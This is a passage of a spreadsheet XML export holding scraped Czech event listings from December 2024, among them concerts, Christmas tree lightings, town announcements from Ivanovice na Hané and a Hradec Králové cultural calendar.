    <t>VI. abonentní koncert KPH: Ensemble Frizzante Kdy: 8. 12. 2024 19:00 Kde: MKS Velký sál Vokální kvintet Ensemble Frizzante má za cíl objevovat zapomenuté skladby a nevšední propojení lidského hlasu s hudebními nástroji. Vznikl v roce 2015 jako soubor profesionálních zpěváků z předních brněnských sborů (Sbor opery Národního divadla v Brně , Český filharmonický sbor Brno a další). Typ akce: hudba (koncert, koncert, koncert, koncert, koncert, koncert, koncert) Eva Daňhelová (soprán) v ystudovala pedagogickou fakultu (obor Hudební výchova) a současně se věnovala studiu zpěvu. S polupracovala s Českým filharmonickým sborem Brno , kde působila jako sólistka, je členkou sboru opery Národního divadla Brno . Veronika Slavíčková ( alt, mezzosoprán) je členkou Českého filharmonického sboru Brno , spolupracuje s dalšími vokálními tělesy jako The Czech Ensemble Baroque, Musica da Camera Brno, Vox Iuvenalis a další. Petr Pytlík (tenor, kontraalt) se z pívat naučil v dětském sboru Jitro a v chlapeckém sboru Boni Pueri, n yní je členem sboru opery Národního divadla v Brně , pravidelně spolupracuje s dalšími soubory a sbory (např. The Czech Ensemble Baroque, Vox Iuvenalis, Žerotín apod.). Antonín Libicher ( tenor) se sborovému zpěvu se věnuje již od gymnaziálních let, později navštěvoval sbor Gaudeamus. Působí rovněž jako klavírista a účinkuje v tenorové skupině Českého filharmonického sboru Brno . Martin Kotulan (bas) je členem sboru opery Národního divadla Brno . Se zpěvem začal v Pěveckém sdružení Foerster (později Český filharmonický sbor ). V letech 1997 – 2013 byl uměleckým vedoucím vokálního souboru Da Capo Ensemble . Vstupenky zakoupíte v Městském informačním centru na Chodském náměstí 96 a on-line . Autor: Autor: || Město Poběžovice</t>
  </si>
  <si>
    <t>20241201_322_3473490869_215976c56f3a8a4e1003.html</t>
  </si>
  <si>
    <t>215976c56f3a8a4e1003</t>
  </si>
  <si>
    <t>Rozsvícení vánočního stromu na Novém Hradci Králové</t>
  </si>
  <si>
    <t>Rozsvícení vánočního stromu na Novém Hradci Králové 27.února - čtvrtek od 19:00 hodin ROZSVÍCENÍ VÁNOČNÍHO STROMU NA NOVÉM HRADCI KRÁLOVÉ Sousedské vánoční setkání u příležitosti slavnostního rozsvícení Vánočního stromu na Svatováclavském náměstí na Novém Hradci Králové. Od 14.00 Zahájení Sousedského vánočního setkání na Svatováclavském náměstí NHK Zajištěno je svařené víno , domácí punč, občerstven pro děti i dospělé Na Svatováclavském náměstí bude návštěvníky provázet vánoční reprodukovaná hudba a doprovodné slovo pořadatelů Od 15.30 vystoupí v kostele sv. Antonína NHK se svým vánočním programem pěvecký soubor RUSALENKY ze ZUŠ Habrmanova (pěvecká třída Heleny Matyášové). V kostele před vystoupením pěveckého sboru zazní i krátká vánoční promluva faráře novohradecké farnosti Kolem 16.15 (dle stmívání) bude rozsvícen Vánoční strom 18.00 Ukončení sousedského setkání Autor: OMEGA Czech - info@omegaczech.cz</t>
  </si>
  <si>
    <t>20241201_323_3473484473_f07a7e608c40e0e84fc4.html</t>
  </si>
  <si>
    <t>f07a7e608c40e0e84fc4</t>
  </si>
  <si>
    <t>Vánoční dílna pro členy Klubu aktivních 55+</t>
  </si>
  <si>
    <t>Vánoční dílna pro členy Klubu aktivních 55+ Kdy: 10. 12. 2024 18:00 Kde: Kavárna Why not Špejchar Městská část Praha – Šeberov si dovoluje pozvat členy Klubu aktivních 55+ na vánoční dílnu 10. prosince 2024 od 18 hodin ve Špejcharu. Typ akce: ostatní (akce pro seniory, besídka) Městská část Praha – Šeberov si dovoluje pozvat členy Klubu aktivních 55+ na vánoční dílnu 10. prosince 2024 od 18 hodin ve Špejcharu. Přijďte nasát předvánoční atmosféru, vyrobit si vánoční dekoraci a popovídat se sousedy u skleničky vína . Prosíme, dejte nám vědět, jestli budete mít o dílnu zájem. Přihlásit se můžete: písemně, telefonicky nebo osobně na úřadě u paní Dvořákové info@seberov.cz tel.: 244 911 713 písemně nebo telefonicky paní Žákové zakova@seberov.cz tel.: 775 590 394 písemně nebo telefonicky paní Melzerové melzerova@seberov.cz tel.: 737 150 368 Na akci se bude pořizovat obrazový a zvukový záznam, který může být použit na webových stránkách, YouTube, sociálních sítích a ve zpravodaji Městské části Praha - Šeberov. Další informace Kavárna Why not Špejchar, V Ladech 1020, Praha Datum vložení: 30. 10. 2024 0:39 Datum poslední aktualizace: 30. 10. 2024 1:10 Informace Autor: Městská část Praha Šeberov</t>
  </si>
  <si>
    <t>132</t>
  </si>
  <si>
    <t>63</t>
  </si>
  <si>
    <t>20241201_324_3473483648_0a3bf26714f261067f6b.html</t>
  </si>
  <si>
    <t>0a3bf26714f261067f6b</t>
  </si>
  <si>
    <t>Neděle 1.12.2024</t>
  </si>
  <si>
    <t>Neděle 1.12.2024 NEDĚLE 1.12.2024 svátek má IVA Město Ivanovice na Hané zve dnes v neděli 1.12.2024 v 15 hodin do kulturního domu na divadelní představení s mikulášskou nadílkou – POHÁDKY PANA POHÁDKY v podání Divadla KK. Vstupné 50 Kč, předprodej vstupenek probíhá v Městské knihovně Ivanovice na Hané, telefonní číslo 517 363 397 nebo online na www.smsticket.cz. Farnost a město Ivanovice na Hané Vás zvou dnes v neděli 1.12.2024 v 17 hodin do kostela sv. Ondřeje na ADVENTNÍ KONCERT v podání multižánrového kvarteta SEŇORITAS. Zazní známé klasické, populární i filmové melodie. Vstupné dobrovolné. Prodejna zahradnických a chovatelských potřeb Hanácká osiva oznamuje změnu otevírací doby na zimní od zítřka soboty 30.11.2024. V pracovní dny bude otevřeno 8-16 hodin, v sobotu bude zavřeno.Prodejna je zásobena kvalitními krmivy jak pro chovná zvířata, tak i pro domácí mazlíčky. Je možnost předzásobení se semínky a substráty. A také možnost výběru drogerie a nářadí za nízké ceny. Kulturní spolek v Ivanovicích a Chvalkovicích na Hané oznamuje: zájezd na Adventní trhy do Prahy je zcela vyprodán. Je sputěna rezervace na Silvestrovskou zábavu. Spoustu let se tu na Silvestra nic nedělo, tak se přijďte pobavit. Zábava se bude konat v KD Ivanovice 31.12.2024 od 20:00 hodin. Zábava bude probíhat formou sousedské párty (vem si s sebou co chceš). A na co víc se můžete těšit: nejen na reprodukovanou taneční hudbu, ale také pro zpestření - soutěže formou hospodského kvízu (soutěž o hodnotné ceny), audiovizuální program, půlnoční přípitek, tombola. Základní občerstvení zajištěno (točené pivo , víno , káva, čaj a drobné pochutiny). Vstupné 100,- Kč. Ostatní informace na letácích, FCB Kulturního spolku a Města Ivanovice a na webových stránkách města. Předprodej a registrace: Ivanovice - paní Burianová (prodejna barev) tel: 737 744 609, Chvalkovice - paní Tesaříková, Chvalkovice 46 tel: 604 664 096 nebo rezervace na e-mailu: kspolekivanovice@seznam.cz. Městská knihovna Ivanovice na Hané oznamuje, že zítra v pondělí 2.12.2024 bude knihovna zavřená. Sdružení kominíků a topenářů bude zítra v pondělí 2.12.2024 provádět požadované kontroly a čištění komínů dle zákonu č. 34/2016 Sb. za 450 Kč, čištění plynových kotlů za 450 Kč a revize kotlů na tuhá paliva za 1 100 Kč. Dále nabízí vložkování a frézování komínů. Bližší info a objednání na telefonním čísle: 608 748 989. Taneční klub DANCE FLOW , z.s. vás srdečně zve do kulturního domu v Ivanovicích na Hané na VÁNOČNÍ TANEČNÍ PŘEDSTAVENÍ pro veřejnost 6.12.2024 v 17:30 hodin a pro rodiče a hosty 7.12.2024 v 15:30 hodin. Přijďte si s námi užít tanec a vánoční atmosféru, občerstvení s vůní svařáku. Těšíme se na vás, vstupné dobrovolné. Společnost EG.D. a.s. oznamuje, že z důvodu plánovaných prací na zařízení distribuční soustavy bude přerušena dodávka elektrické energie dne 9.12.2024 v Ivanovicích na Hané v době od 7:30 do 15 hodin část ulice Žižkova od č.p.24 po č.p. 37, garáže a Tyršova č.p. 1. Prodejna českých potravin RYNEK Ivanovice na Hané (na autobusovém nádraží) vás zve k nákupu vybraných akčních potravin: vepřové koleno zadní s kostí 1 kg 85,-Kč, hovězí kosti na polévku 1 kg za 31,-Kč, salám Gothaj 100 g za 15,50Kč, gulášová polévka 100 g za 11,50 Kč, tvarohový dezert 150 g za 21,- Kč, víno stáčené Rulandské bílé 1 l 77,-Kč. V nabídce jsou i další skvělé potraviny. Přijďte se podívat a nakoupit. Těšíme se na Vás. Prodejní doba je: Po – Pá 7:30 – 17:30 hodin, So 7:30 – 11:00 hodin. Populární herec a bavič Miroslav Donutil zavítá 19. prosince do Ivanovic na Hané . V kulturním domě od 19 hod. představí svůj nejoblíbenější pořad "Na kus řeči". Vstupenky lze zakoupit v Městské knihovně v Ivanovicích na Hané nebo on-line na www.ticketevent.cz. RODINNÁ FIRMA KAMENIVO SUCHOMEL S.R.O., MORKOVICE-SLÍŽANY prodává palivové dřevo tvrdé i měkké, řezané, štípané, různé délky. Krátké dodací lhůty. Dále v prodeji dřevěné brikety RUF a puky, písky, cement, drcené a okrasné kamenivo, beton, cihelný a betonový recyklát, mulčovací kůra. Další informace a objednávky na telefonu 602 702 200, E-shop: www.kamenivo-suchomel.cz. Firma Dobrá Uklízečka hledá nové pracovníky na úklid kanceláří, skladů, společných prostor, možnost volby směn ranní nebo odpolední. Práce je vyhrazena pro osoby se zdravotním postižením. NÁSTUP: možný IHNED.Kontakt telefonicky nebo e-mailem: +420 774 079 421, prace@dobrauklizecka.cz Datum vložení: 1. 12. 2024 0:01 Datum poslední aktualizace: 1. 12. 2024 0:01 Autor: Radka Vránová Informace Autor: Radka Vránová Autor person Radka Vránová</t>
  </si>
  <si>
    <t>195</t>
  </si>
  <si>
    <t>20241201_325_3473484716_312cf1b77f4781b9d91b.html</t>
  </si>
  <si>
    <t>312cf1b77f4781b9d91b</t>
  </si>
  <si>
    <t>Kalendarium 27.února - čtvrtek od 19:00 hodin Kulturní akce dne: 01. 12. 2024 2024-11-01 09:00:00 2024-12-31 12:00:00 01.prosinec - neděle od 09:00 hodin V listopadu a prosinci 2024 si můžete v PETROF Gallery už podruhé prohlédnout “Pastely” Nadi Voldánové. Její obrazy nabízejí realistický pohled na objekty ze života kolem nás v kontrastu s černou a bílou plochou v osobitém pojetí výtvarnice, členky Unie výtvarných umělců Královéhradeckého regionu a také Náchodského výtvarného ateliéru Amag. Unikátní atmosféru hudební kavárny doplní přehlídka děl, vyvolávajících pocity pohody. Autorka, žijící střídavě v Praze a v České Skalici , se věnuje technice suchého pastelu, která jí umožňuje realizovat výtvarné záměry. GLADIATOR RACE FINAL 01.prosinec - neděle od 09:00 hodin Poslední závod sezóny si žádá speciální přístup. Připravte se na rozmazlování, spoustu dárků a v neposlední řadě i nejlepší a nejzábavnější překážky, které Gladiator Race nabízí. Svoji náruč naposledy pro závod otevře Gladiator Race Arena na Stříbrném rybníku v Hradci Králové . Čeká na Vás jedinečný zážitek plný zábavy, překvapení, dobrodružství a adrenalinu! 01.prosinec - neděle od 10:00 hodin Kdo by neznal Kelty, jejich oppida a společnost? Doklady jejich přítomnosti pochází z celé republiky, avšak velká část východních Čech se nachází mimo centrum našeho keltského světa. Výstava představí právě tyto okrajové oblasti a zodpoví otázku, jestli zdejší krajinou chodili druidové nebo zde keltské lišky dávaly dobrou noc. 01.prosinec - neděle od 10:00 hodin DIZAJNIŠTĚ - Krátkodobá výstava Kreativní hřiště pro malé i velké Kurátor: Tereza Vlašímská Vyrobily dílny Divadla Drak: Roman Beran, Michaela Kudelková, Hana Kopová, Layla Hruška Ottová, Štěpán Uherka Grafické úpravy: Jindřich Max Pavlíček Produkce: Barbora Kalinová, Martina Štětinová Technické řešení: Petr Seiner Světla: Libor Petr Lektorský program: Kateřina Hanková, Jana Neduha, Klára Fidlerová, Klára Svobodová Interaktivní výstava Dizajniště hravou formou seznamuje s metodou designového myšlení a krok za krokem děti naučí, jak myslet a navrhovat jako designér. Výstava provede návštěvníky cestou od designového nápadu až k jeho realizaci pomocí designového myšlení. Prostřednictvím jednoduchého návodu s pěti fázemi - empatie, definice, ideace, prototyp, testování - mohou účastníci ve své práci i každodenním životě objevovat nová kreativní řešení a zažít přitom spoustu tvůrčího dobrodružství. Designové myšlení učí kreativnímu řešení problémů, generování nápadů a schopnostem je vyhodnocovat, rozvíjí komunikační a prezentační dovednosti, podporuje práci v kolektivu, je inkluzivní, je zábavné, poučné a hravé. Pro školní kolektivy nabízíme lektorské programy, které návštěvníky provedou je celým kreativním procesem. Žáci a studenti si na nich osvojí sběr, třídění, analyzování a vyhodnocování informací a jak je mohou tvůrčím způsobem aplikovat v nových souvislostech a situacích. V pěti krocích se dostanou od nápadu k až realizaci. Účastníci přirozeně rozvinou celou řadu důležitých kompetencí: týmovou spolupráci, prezentaci, komunikaci a vizualizaci myšlenek, argumentaci, vedení diskuse i polemiky. Designové myšlení spojuje, narušuje bariéry mezi lidmi a přispívá k sebenaplnění. Lektorské programy pro školní kolektivy jsou uzpůsobeny různým věkovým kategoriím návštěvníků základních i středních škol. Autory expozice jsou designoví aktivisté, kreativci a patrioti z karlovarského spolku PROTEBE live, který již od roku 2005 buduje image Karlových Varů jako kulturního a občansky aktivního města. K tomu nemalou měrou pomáhá jejich kreativní centrum DIZAJNPARK v prostorách tuhnického výměníku. PŘÍBĚH DRAKU 1958-2018 - Stálá expozice Koncepce a libreto výstavy: Tomáš Jarkovský Návrh a realizace instalací: Tereza Vašíčková Odborná konzultace: Miloslav Klíma Spolupráce na instalaci: Dílny a technici Divadla Drak Určeno pro celou rodinu. Výstava Příběh Draku 1958–2018 vypráví příběh 60leté historie Divadla Drak. Prostřednictvím vystavených loutek, fotografií, scénografických návrhů, ukázek z inscenací a dalších dobových materiálů zachycuje proměny drakovského divadelního jazyka a zároveň přibližuje nezaměnitelnou atmosféru divadla. Představuje Drak jako místo tvorby, ale také jako křižovatku osudů těch, kteří jeho příběh po 60 let spoluvytvářeli. Expozice se skládá z 31 zastavení věnovaných významným inscenacím, osobnostem nebo událostem v historii divadla, která jsou rozdělena do osmi tematických celků. Prvních pět je řazeno chronologicky a vypraví příběh divadla od jeho počátků až k oslavám 60. výročí založení. Připomíná důležité milníky historie Draku a představuje významné inscenace či osobnosti, které jsou s jednotlivými etapami vývoje divadla spojeny. Poslední tři části-zastavení představující kompletní výpravu legendární inscenace O Sněhurce, unikátní dokument Jana Špáty a bilanci bohaté zájezdové činnosti divadla pak společně tvoří jakýsi epilog výstavy. Stručný komentář ke každému zastavení naleznete spolu s orientační mapkou v tištěném průvodci výstavou. Výstava byla realizována s finanční podporou Nadace ČEZ . Pohádky v AdaluVhodné pro děti od 4 let 01.prosinec - neděle od 10:00 hodin Veselá pohádková inscenace o napravení jedné rozjívené čertice. Účinkuje činoherní soubor STUDIO PH POHÁDKA, určeno dětem od čtyř let. Pokud je divákem dítě mladší, má vstup zdarma, ovšem bez nároku na místo. Vstupenku do sálu musí mít dětský i dospělý divák. Vstupenky nejsou číslovány, v sále je volný zasedací pořádek. Prosíme dospělé diváky, aby při výběru míst brali ohled na ty malé, kterým by případně mohli bránit ve výhledu. Děkujeme. PROHLÍDKY MVE HUČÁK NEJEN PRO SENIORY 01.prosinec - neděle od 11:00 hodin Každou první neděli v měsíci vás vezmeme do historie Malé vodní elektrárny Hučák, a to nejen pohledem na doborvé fotografie, ale také do stále plně funkční historické strojovny. Těšíme se na vás tyto neděle: 7. ledna, 4. února, 3. března, 7. dubna, 5. května, 2. června, 7. července, 4. srpna, 1. září, 6. října, 3. listopadu, 1. prosince. Prohlídky se uskuteční vždy v časech od 11:00, 13:00, 15:00 hodin. Na prohlídky není potřeba se registrovat. PROHLÍDKY MVE HUČÁK NEJEN PRO SENIORY 01.prosinec - neděle od 13:00 hodin Každou první neděli v měsíci vás vezmeme do historie Malé vodní elektrárny Hučák, a to nejen pohledem na doborvé fotografie, ale také do stále plně funkční historické strojovny. Těšíme se na vás tyto neděle: 7. ledna, 4. února, 3. března, 7. dubna, 5. května, 2. června, 7. července, 4. srpna, 1. září, 6. října, 3. listopadu, 1. prosince. Prohlídky se uskuteční vždy v časech od 11:00, 13:00, 15:00 hodin. Na prohlídky není potřeba se registrovat. Puffin Rock and the New Friends 01.prosinec - neděle od 13:00 hodin Napínavý příběh, který oslavuje nádherný život vzácných ptáků a zahrnuje témata odvahy a přátelství. Když nechráněné vajíčko zmizí za záhadných okolností, Oona a její přátelé závodí s časem, aby jej přinesli zpět domů. Skutečnou hrozbou je však v tomto ekologickém příběhu změna klimatu - opeřená skála přivítá komunitu zvířecích uprchlíků, jejichž životní prostředí bylo zpustošeno bouřemi. A po několika nedorozuměních a hrozby ze strany racků si papuchalka Oona a její bratříček Baba najdou nové kamarády. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-12-01 13:15:00 2024-12-01 14:55:00 Moana 2 01.prosinec - neděle od 13:15 hodin Vaiana, která zcela neočekávané obdrží žádost o pomoc od svých odvážných předků, se společně s Mauim a zcela novou posádkou vydává na pouť po mořských dálavách Oceánie do nebezpečných a dávno zapomenutých vod, kde na ni čeká dobrodružství plné nástrah, s jakými se dosud nikdy nesetkala. 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-11-29 14:00:00 2024-12-01 18:00:00 01.prosinec - neděle od 14:00 hodin Pá: 14:00-18:00 01.prosinec - neděle od 14:00 hodin Sousedské vánoční setkání u příležitosti slavnostního rozsvícení Vánočního stromu na Svatováclavském náměstí na Novém Hradci Králové. Od 14.00 Zahájení Sousedského vánočního setkání na Svatováclavském náměstí NHK Zajištěno je svařené víno , domácí punč, občerstven pro děti i dospělé Na Svatováclavském náměstí bude návštěvníky provázet vánoční reprodukovaná hudba a doprovodné slovo pořadatelů Od 15.30 vystoupí v kostele sv. Antonína NHK se svým vánočním programem pěvecký soubor RUSALENKY ze ZUŠ Habrmanova (pěvecká třída Heleny Matyášové). V kostele před vystoupením pěveckého sboru zazní i krátká vánoční promluva faráře novohradecké farnosti Kolem 16.15 (dle stmívání) bude rozsvícen Vánoční strom 18.00 Ukončení sousedského setkání PROHLÍDKY MVE HUČÁK NEJEN PRO SENIORY 01.prosinec - neděle od 15:00 hodin Každou první neděli v měsíci vás vezmeme do historie Malé vodní elektrárny Hučák, a to nejen pohledem na doborvé fotografie, ale také do stále plně funkční historické strojovny. Těšíme se na vás tyto neděle: 7. ledna, 4. února, 3. března, 7. dubna, 5. května, 2. června, 7. července, 4. srpna, 1. září, 6. října, 3. listopadu, 1. prosince. Prohlídky se uskuteční vždy v časech od 11:00, 13:00, 15:00 hodin. Na prohlídky není potřeba se registrovat. BARBORA POLÁKOVÁ – NĚHY 01.prosinec - neděle od 15:00 hodin Bára Poláková propojuje v sérii velmi osobních koncertů s názvem NĚHY vše důležité: tři studiová alba, předchozí úspěšný projekt Něhy live session - skladby převlečené do klidu a křehkosti a úplně nové audiovizuální zpracování. Unikátní scénu a kostýmy, které sílu něžné hudby ještě umocní, vytvořil scénograf Marek Cpin. Bára, pětičlenná kapela a pět vokalistů si pro vystoupení vybrali místa s osobitou duší a perfektní akustikou, jež jsou se snovou atmosférou v souladu… „NĚHY pro mě hodně znamenají, je to návrat ke komornosti a k divadelním scénám. Nesou v sobě blízkost. Ticho. Intimitu. Otevírání témat, která jsou v textech ve větším klidu. Tohle všechno se mnou teď rezonuje a ten čas zklidnění vnímám jako léčivý,“ zve na turné NĚHY Bára Poláková. 790 vstupné 750 Kč, 790 Kč | Hlavní scéna | KLICPEROVO DIVADLO o.p.s. Hlavní scéna 2024-12-01 15:00:00 2024-12-01 16:24:00 The Proud PrincessPyšná princezna 01.prosinec - neděle od 15:00 hodin Animovaný film Pyšná princezna vypráví příběh krále Miroslava, který se zamiluje do obrazu krásné, ale pyšné princezny Krasomily. Aby získal její srdce, vydá se do Půlnočního království v převleku za prostého zahradníka. Následně objeví neobyčejnou zpívající květinu, která okouzlí i samotnou princeznu. Krasomila si díky ní i Miroslavovi uvědomí, že byla po celou dobu manipulována proradnými rádci, a společně před nebezpečím utečou z hradu. Začíná tak dobrodružná cesta plná nástrah, napínavých honiček i soubojů. Zlý rádce Maximus je totiž odhodlán jejich lásku zničit… Režiséři Radek Beran a David Lisý vytvořili výpravnou pohádku, která vzdává hold české klasice, dává ji všechny barvy a zároveň obohacuje o nové postavy a moderní techniky vyprávění. Animace čerpá z krásy české krajiny, která sloužila jako hlavní vizuální inspirace. Detailně propracované scenérie a pestrobarevné přírodní prostředí zaručují velký zážitek pro malé i velké diváky. Kromě známých postav princezny Krasomily a krále Miroslava se diváci mohou těšit na nové přírůstky v pohádkovém světě – hodného pejska Bijou a zákeřnou lasici Slídila, kteří do příběhu vnášejí napětí i komediální prvky. Hudbu k filmu složili Ondřej Brzobohatý a Ondřej Brousek , kteří skloubili původní melodie inspirované Bedřichem Smetanou a známé hudební motivy z původní hrané verze. Jejich kompozice dodává filmu bohatou hudební vrstvu, která propojuje klasiku s moderními prvky. V dabingu excelují přední čeští herci. Anna Fialová propůjčila hlas princezně Krasomile, Marek Lambora oživuje krále Miroslava a Aleš Procházka se postaral o postavu rádce Maxima. Jejich výkony přinášejí silné emoce a zábavné dialogy, které osloví všechny generace. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-12-01 15:30:00 2024-12-01 17:12:00 Kaytek the WizardKajtek Czarodziej 01.prosinec - neděle od 15:30 hodin Kajtek je obyčejný kluk – trochu blbne, trochu si vymýšlí a rád poslouchá příběhy, které mu vypráví babička. Po smrti maminky zůstal jen s ní, a tak často utíká do světa dětské fantazie a představuje si, jaké by to bylo mít superschopnosti. A jednoho dne zjistí, že je skutečně má. Magická moc ale nejdřív ovládne jeho. Narozdíl od svého britského následovníka Harryho Pottera totiž nenavštěvuje Školu čar a kouzel v Bradavicích, kde by ho naučili s ní zacházet. Je to samouk, a tak se nejednou nechá unést zvědavostí, někdy jen z legrace a pro radost, jindy dokonce ze škodolibosti. A nejednou se to všechno taky vymkne kontrole. Když jeho milovaná babička zemře, zjišťuje, že na některé věci ani kouzla nestačí, s čímž se odmítá smířit. Neuspěje a ve své bezmoci a touze pomstít se světu za nespravedlivý osud je vystavený pokušení přejít na temnou stranu magie. Utíká z rodného města, kde svými magickými kousky způsobil pořádný chaos a získal pověst rebela, a vydává se poznat skutečný svět i sebe sama. Na dobrodružné cestě potká dívku, která má také nadpřirozené schopnosti, a společně se utkají s temným mágem. Ten nejtěžší boj mezi dobrem a zlem ale bude muset Kajtek svést sám v sobě. A přijmout následky svých rozhodnutí. 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-12-01 16:00:00 2024-12-01 18:00:00 01.prosinec - neděle od 16:00 hodin Zveme Vás na rozsvícení vánočního stromečku! Přijďte s námi přivítat adventní období slavnostním rozsvícením vánočního stromku. Čeká na Vás kouzelná atmosféra plná vánočních světel, vůně horkého svařáku a krásných věnců, které si můžete rovnou odnést domů. Těšíme se, že společně zahájíme advent a užijeme si chvíle plné vánoční pohody. Přijďte s rodinou a přáteli, přidejte se k nám a nalaďte se na Vánoce! Otevřeno bude po celý den! Koncertní řada Stříbrná 01.prosinec - neděle od 17:00 hodin Varhany orchestrem. Světová výstava možností symfonických varhan. Liszt osvobozoval Promethea s celým orchestrem nebo aspoň dvěma klavíry, vizionáři Guillouovi stačí jedny varhany (hraje-li na ně fenomenální Slovenka Ferjenčíková). PLÉNO VARHAN FHK VIVALDI / GUILLOU KONCERT RV 230 FRANCK FANTAZIE A DUR LISZT / GUILLOU PROMETHEUS, SYMFONICKÁ BÁSEŇ WIDOR SYMFONIE Č. 5 (VÝBĚR) FERJENČÍKOVÁ IMPROVIZACE NA ZADANÁ TÉMATA Zuzana Ferjenčíková varhany 400 vstupné 200 Kč, 400 Kč | Sál Filharmonie Hradec Králové | Filharmonie Hradec Králové Sál Filharmonie Hradec Králové 2024-12-01 17:00:00 2024-12-01 20:00:00 01.prosinec - neděle od 17:00 hodin Slavnostní rozsvícení vánočního stromu s doprovodným programem za přítomnosti představitelů města Hradec Králové . Program: 17:00 - vystoupení Královéhradecký dětský sbor JITRO 18:15 hodin vystoupí folková skupina PŘÍSTAV 19:00 hodin proběhne rozsvícení vánočního stromu 19:05 hodin vystoupí SPIRITUÁL KVARTET Více informací nejen o této akci, ale také o dalších adventních událostech a vánočních trzích v Hradci Králové najdete na oficiálním webu vanocevhradci.cz Zúčastněte se tradičního rozsvícení vánočního stromu v Hradci Králové a oslavte spolu s námi příchod adventu. 01.prosinec - neděle od 17:00 hodin SLAVNOSTNÍ GALAVEČER 01.prosinec - neděle od 17:00 hodin SLAVNOSTNÍ GALAVEČER 01.prosinec - neděle od 17:00 hodin Každou adventní neděli 2024 od 17.00 hodin v evangelickém kostele (u soudu) 1. adventní neděle - 1. prosince Smíšený sbor Jitro + Schola od sv. Mořice ( Olomouc ) Adventní zpívání pořádá Farní sbor Českobratrské církve evangelické za podpory statutárního města Hradec Králové Gladiator II 01.prosinec - neděle od 17:00 hodin Lucius (Paul Mescal), vnuk císaře Marka Aurelia a syn „prvního“ gladiátora Maxima, žije v utajení v jednom z posledních svobodných měst na severu Afriky . Rozpínavá Římská říše ho však nenechá na pokoji. Stačí jeden masívní útok loďstva vedeného generálem Acaciem ( Pedro Pascal ) a prosperující město se změní v ruiny a svobodný Lucius v bezejmenného otroka. Urostlého zajatce si všimne organizátor gladiátorských zápasů Macrinus ( Denzel Washington ), který z něj chce mít hvězdu Římského kolosea (než ho nahradí někdo schopnější). Gladiátorské hry však nejsou tou hlavní hrou, kterou Marcinus hraje. Důmyslný stratég si uvědomuje slabost impéria ovládaného dvěma šílenými císaři, Caracallou a Getou, a rozehraje riskantní partii, v níž na pomyslné šachovnici bojují gladiátor a také právoplatný dědic římského trůnu Lucius, jeho matka Lucilla ( Connie Nielsen , která si zopakovala roli z prvního dílu) a generál Acacius, její manžel a zároveň muž, kterého její syn k smrti nenávidí, protože mu zničil život. Blíží se střet, při kterém krev nepoteče jen Koloseem, ale i ulicemi Říma . 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-12-01 18:00:00 2024-12-01 19:37:00 Aneta 01.prosinec - neděle od 18:00 hodin Třiadvacetiletá Aneta spáchala sebevraždu třinácti ranami nožem. Ne, nejde o námět hororové sci-fi, ale o oficiální závěr české policie. A také o příběh snad nejkontroverznějšího kriminálního případu moderní historie. Případu, který se odehrál už před deseti lety. To ale neznamená, že je čas zapomenout. Naopak! Dokument Aneta přinese nové, naprosto zásadní informace a zjištění, která mohou znamenat zásadní zvrat v celé kauze 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-12-01 19:00:00 2024-12-01 20:30:00 BARBORA POLÁKOVÁ – NĚHY 01.prosinec - neděle od 19:00 hodin Bára Poláková propojuje v sérii velmi osobních koncertů s názvem NĚHY vše důležité: tři studiová alba, předchozí úspěšný projekt Něhy live session - skladby převlečené do klidu a křehkosti a úplně nové audiovizuální zpracování. Unikátní scénu a kostýmy, které sílu něžné hudby ještě umocní, vytvořil scénograf Marek Cpin. Bára, pětičlenná kapela a pět vokalistů si pro vystoupení vybrali místa s osobitou duší a perfektní akustikou, jež jsou se snovou atmosférou v souladu… „NĚHY pro mě hodně znamenají, je to návrat ke komornosti a k divadelním scénám. Nesou v sobě blízkost. Ticho. Intimitu. Otevírání témat, která jsou v textech ve větším klidu. Tohle všechno se mnou teď rezonuje a ten čas zklidnění vnímám jako léčivý,“ zve na turné NĚHY Bára Poláková. 790 vstupné 750 Kč, 790 Kč | Hlavní scéna | KLICPEROVO DIVADLO o.p.s. Hlavní scéna 2024-12-01 20:00:00 2024-12-01 21:30:00 01.prosinec - neděle od 20:00 hodin Richard Müller : 40 let na scéně - Vánoční tour Richard Müller v letošním roce oslavuje neuvěřitelných 40 let na hudební scéně. Pojďme to společně s ním a jeho kapelou oslavit! A jak lépe toto jubileum oslavit než koncertem, na kterém uslyšíte jeho nesmrtelné hity, které se zaryly do srdcí několika generacím fanoušků. Nebudou samozřejmě chybět ale ani novější písně, protože tvůrčí aktivita Richarda Müllera ani po 40 letech neutichá. Vstupenky můžete zakoupit online přímo na ticketportal.cz - eTickets, k dispozici jsou i prodejní místa Ticketportal. Další info: slevy NE / děti do věku 5 let včetně zdarma bez nároku na vlastní sedadlo / bezbariérový přístup ANO, Přízemí / vstupenka "ZTP/P" umožňuje společný vstup dvou návštěvníků - držitele průkazu ZTP/P a jedné osoby jako doprovod (obvykle standardní sedadlo + přístavek) Architektura ČSSR 58–89 01.prosinec - neděle od 20:15 hodin Unikátní dokument v režii Jana Zajíčka o československé předrevoluční architektonické scéně. Tvůrci neobyčejně a s vášní představují výjimečné budovy postavené v období od Expa 1958 po sametovou revoluci, zpovídají jejich architekty, odhalují příběhy a nesmírné úsilí, které se za vznikem těchto staveb skrývá. Dokument navazuje na úspěšný knižní projekt a seriál z produkce České televize podle námětu Vladimira 518 , oproti zmíněným se více zaměřuje na bohatou slovenskou tvorbu. Obrazová a střihová originalita podtrhuje mimořádnost tohoto filmového projektu. Řada staveb a bohužel i autorů se již nedožila premiéry snímku, a dokument je tak důležitou připomínkou jejich tvůrčího nadání a odkazu. 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-12-01 20:30:00 2024-12-01 22:17:00 The Room Next DoorLa habitación de al lado 01.prosinec - neděle od 20:30 hodin Ingrid ( Julianne Moore ) a Martha (Tilda Swinton) jsou blízké přítelkyně z mládí, kdy spolu pracovaly ve stejném časopise. Po letech odloučení se znovu setkávají, v poněkud extrémní, ale podivně milé situaci. Autor: OMEGA Czech - info@omegaczech.cz</t>
  </si>
  <si>
    <t>20241201_326_3473483895_487768a53bc352b02412.html</t>
  </si>
  <si>
    <t>487768a53bc352b02412</t>
  </si>
  <si>
    <t>Ladislav Zibura – Naposledy pěšky po Arménii a Gruzii (Besedy a přednášky)</t>
  </si>
  <si>
